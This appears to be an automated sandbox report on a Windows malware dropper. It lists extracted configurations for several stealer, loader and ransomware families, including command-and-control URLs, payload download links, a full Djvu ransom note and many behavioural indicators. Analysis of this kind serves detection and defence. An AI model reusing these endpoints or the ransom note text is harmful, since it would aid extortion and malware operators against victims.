amadey | e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555

Analysis

max time kernel
66s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
24-05-2022 13:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe
Size

9.1MB
MD5

93e23e5bed552c0500856641d19729a8
SHA1

7e14cdf808dcd21d766a4054935c87c89c037445
SHA256

e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555
SHA512

3996d6144bd7dab401df7f95d4623ba91502619446d7c877c2ecb601f23433c9447168e959a90458e0fae3d9d39a03c25642f611dbc3114917cad48aca2594ff

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.znsjis.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://govsurplusstore.com/upload/

http://best-forsale.com/upload/

http://chmxnautoparts.com/upload/

http://kwazone.com/upload/

rc4.i32

Extracted

Family

amadey

Version

3.10

185.215.113.38/f8dfksdj3/index.php

Extracted

Family

djvu

http://ugll.org/test3/get.php

Attributes

extension
.zpps
offline_id
vBBkNb2o254Xzi3oCcyyfpBNyU9yOZKLh1HH5Mt1
payload_url
http://zerit.top/dl/build2.exe
http://ugll.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-wYSZeUnrpa Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: admin@helpdata.top Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0486JIjdm

rsa_pubkey.plain

Extracted

Family

vidar

Version

52.3

Botnet

937

https://t.me/hyipsdigest

https://mastodon.online/@ronxik13

Attributes

profile_id
937

Extracted

Family

redline

Botnet

@humus228p

185.215.113.24:15994

Attributes

auth_value
bb99a32fdff98741feb69d524760afae

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detected Djvu ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1980-458-0x0000000002110000-0x000000000222B000-memory.dmp	family_djvu
behavioral2/memory/4056-471-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
FFDroider
Stealer targeting social media platform users first seen in April 2022.
stealer ffdroider

FFDroider Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/764-371-0x0000000000EE0000-0x000000000148C000-memory.dmp	family_ffdroider

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4292-233-0x0000000003980000-0x000000000429E000-memory.dmp	family_glupteba
behavioral2/memory/4292-235-0x0000000000400000-0x0000000002FBF000-memory.dmp	family_glupteba
behavioral2/memory/4332-296-0x0000000000400000-0x0000000002FBF000-memory.dmp	family_glupteba
behavioral2/memory/2600-377-0x0000000000400000-0x0000000002FBF000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 64 1004 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	64	1004	rUNdlL32.eXe

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1016-439-0x00000000003B0000-0x00000000005F2000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\file2.exe.exe	family_redline
C:\Users\Admin\Pictures\Adobe Films\file2.exe.exe	family_redline
behavioral2/memory/448-440-0x00000000009D0000-0x0000000000C28000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\Fenix_13.bmp.exe	family_redline
C:\Users\Admin\Pictures\Adobe Films\Fenix_13.bmp.exe	family_redline
behavioral2/memory/3036-492-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 2016 created 4292 2016 svchost.exe Graphics.exe
PID 2016 created 2600 2016 svchost.exe csrss.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Win32/FFDroider CnC Activity M2
suricata: ET MALWARE Win32/FFDroider CnC Activity M2
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

description	pid	process	target process
PID 2016 created 4292	2016	svchost.exe	Graphics.exe
PID 2016 created 2600	2016	svchost.exe	csrss.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/176-379-0x00000000005C0000-0x00000000005F0000-memory.dmp	family_onlylogger
behavioral2/memory/176-380-0x0000000000400000-0x00000000004BF000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2008-486-0x0000000000400000-0x00000000004A7000-memory.dmp	family_vidar
behavioral2/memory/2008-483-0x00000000004F0000-0x000000000053F000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 18 IoCs

Processes:

md9_1sjm.exeFoxSBrowser.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFile.exepub2.exeFiles.exeDetails.exeFolder.exeGraphics.execsrss.exeinjector.exeNiceProcessX64.bmp.exeTrdngAnlzr649.exe.exeService.bmp.exeSetupMEXX.exe.exe

pid	process
764	md9_1sjm.exe
2988	FoxSBrowser.exe
3000	Folder.exe
4292	Graphics.exe
4284	Updbdate.exe
3356	Install.exe
1008	File.exe
4444	pub2.exe
2060	Files.exe
176	Details.exe
2428	Folder.exe
4332	Graphics.exe
2600	csrss.exe
1924	injector.exe
2488	NiceProcessX64.bmp.exe
2400	TrdngAnlzr649.exe.exe
2280	Service.bmp.exe
4368	SetupMEXX.exe.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64_1.bmp.exe	upx
C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64_1.bmp.exe	upx
C:\Users\Admin\Pictures\Adobe Films\malina.exe.exe	upx
C:\Users\Admin\Pictures\Adobe Films\malina.exe.exe	upx

VMProtect packed file 5 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\fxd1.bmp.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\fxd1.bmp.exe	vmprotect
behavioral2/memory/1664-450-0x0000000000620000-0x0000000000EE1000-memory.dmp	vmprotect
behavioral2/memory/4396-499-0x0000000000720000-0x0000000000FE1000-memory.dmp	vmprotect
behavioral2/memory/4396-501-0x0000000000720000-0x0000000000FE1000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Folder.exeFile.exee4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	e4b23ebeb82594979325357ce20f14f70143d98ff49a9d5a2e6258fbfb33e555.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3632 rundll32.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

4180 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3632	rundll32.exe

pid	process
4180	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrimsonSilence = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

93 ipinfo.io
232 ipinfo.io
22 ip-api.com
94 ipinfo.io
190 ipinfo.io
191 ipinfo.io
208 api.2ip.ua
209 api.2ip.ua
233 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File opened for modification C:\Windows\rss Graphics.exe
File created C:\Windows\rss\csrss.exe Graphics.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
93	ipinfo.io
232	ipinfo.io
22	ip-api.com
94	ipinfo.io
190	ipinfo.io
191	ipinfo.io
208	api.2ip.ua
209	api.2ip.ua
233	ipinfo.io

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Program crash 13 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
840	3632	WerFault.exe	rundll32.exe
2348	1148	WerFault.exe	Mixinte23.bmp.exe
4412	2180	WerFault.exe	lol.bmp.exe
1908	2360	WerFault.exe	olympteam_build_crypted_6.bmp.exe
4540	1148	WerFault.exe	Mixinte23.bmp.exe
5048	2400	WerFault.exe	TrdngAnlzr649.exe.exe
4016	1148	WerFault.exe	Mixinte23.bmp.exe
3804	176	WerFault.exe	Details.exe
2124	176	WerFault.exe	Details.exe
1812	4860	WerFault.exe	JALImhCBZRe9iFbuIF8ffwYF.exe
4668	4860	WerFault.exe	JALImhCBZRe9iFbuIF8ffwYF.exe
4928	4860	WerFault.exe	JALImhCBZRe9iFbuIF8ffwYF.exe
5100	1148	WerFault.exe	Mixinte23.bmp.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3104 schtasks.exe
4592 schtasks.exe
4448 schtasks.exe
1060 schtasks.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 48 Go-http-client/1.1
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4584 taskkill.exe

pid	process
3104	schtasks.exe
4592	schtasks.exe
4448	schtasks.exe
1060	schtasks.exe

description	flow	ioc
HTTP User-Agent header	48	Go-http-client/1.1

pid	process
4584	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exeGraphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	Graphics.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	csrss.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Install.exeGraphics.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615b